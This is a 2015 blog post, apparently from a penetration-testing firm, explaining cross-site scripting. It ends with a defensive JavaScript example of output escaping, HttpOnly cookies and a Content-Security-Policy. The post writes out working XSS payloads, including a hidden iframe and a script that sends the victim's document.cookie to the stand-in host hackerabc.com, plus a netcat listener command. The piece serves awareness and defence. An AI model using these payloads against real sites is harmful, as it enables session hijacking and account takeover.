March 24, 2015

Cross-site scripting, or XSS, is one of the most common vulnerabilities in web applications. We find some variation of this vulnerability in 70% of our penetration tests. Now why is XSS so dangerous? Because it allows an ordinary visitor to a web site to execute commands through the web application, which in the worst-case scenario can be used to obtain full control over the web server.

Examples

Think of a guest book or form application. Instead of leaving a text, a malicious person could put in:

<script>alert("VULNERABLE")</script>

If vulnerable, a pop up will appear saying VULNERABLE.

If an XSS vulnerability is found, a lot of damage can be done. For example, an iframe can be injected to send the victim's browser to an attacker's web server:

<iframe src="http://hackerabc.com/blah" height="0" width="0"></iframe>

The attacker would then run a simple netcat listener: nc -nlvp 80

and get quite a bit of info about the victim's browser.

But far worse could be done. The session cookie can be stolen. That means if the user is logged into the application, a malicious attacker could then take over this application by replaying the session ID:

<script> new Image().src="http://hackerabc.com/bad.php?output="+document.cookie; </script>

Cookie Manager (a Firefox plugin) can be used to replay the session ID and take over the session.

Those are very basic examples, and there are far more sophisticated attacks (like having the victim web server send a full reverse shell). In our pentests we regularly come across those, so we would like to stress that XSS is a serious threat these days.
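On the defensive side, the guest book and session cookie cases above come down to two fixes: encode visitor input when it is written into the page, and keep the session cookie out of reach of document.cookie. The following is an added example, not code from the original post; the function names, the SID cookie name and the sample entries are assumptions made for illustration.

```javascript
// Added example: guest book rendering, vulnerable next to hardened.
// All names here are hypothetical; sample data is constructed.

// Characters that must be encoded when untrusted text is placed in
// HTML element content or inside a quoted attribute value.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the visitor's entry is concatenated into the page as markup.
function renderEntryVulnerable(entry) {
  return `<li><b>${entry.name}</b>: ${entry.message}</li>`;
}

// Hardened: every untrusted field is encoded at output time.
function renderEntrySafe(entry) {
  return `<li><b>${escapeHtml(entry.name)}</b>: ${escapeHtml(entry.message)}</li>`;
}

function renderGuestBook(entries, renderEntry) {
  return `<ul>\n${entries.map(renderEntry).join("\n")}\n</ul>`;
}

// HttpOnly hides the cookie from document.cookie, so an injected script
// cannot read it; Secure and SameSite restrict when it is sent.
function sessionCookieHeader(sessionId) {
  return `Set-Cookie: SID=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Defence in depth: without 'unsafe-inline', inline <script> blocks are
// refused, and frames and images may only load from the site itself.
const CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'; frame-src 'self'";

// Constructed sample entries reusing the strings shown in the article.
const SAMPLE_ENTRIES = [
  { name: "alice", message: "Nice site!" },
  { name: "mallory", message: '<script>alert("VULNERABLE")</script>' },
  { name: "mallory", message: '<iframe src="http://hackerabc.com/blah" height="0" width="0"></iframe>' },
];

console.log(renderGuestBook(SAMPLE_ENTRIES, renderEntryVulnerable)); // markup survives
console.log(renderGuestBook(SAMPLE_ENTRIES, renderEntrySafe));       // markup shown as text
console.log(sessionCookieHeader("constructed-session-id"));
console.log(CSP_HEADER);
```

The escaping shown covers HTML element content and quoted attributes only; values placed inside script blocks, URLs or CSS need encoding specific to that context.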

A good starting point is: http://en.wikipedia.org/wiki/Cross-site_scripting
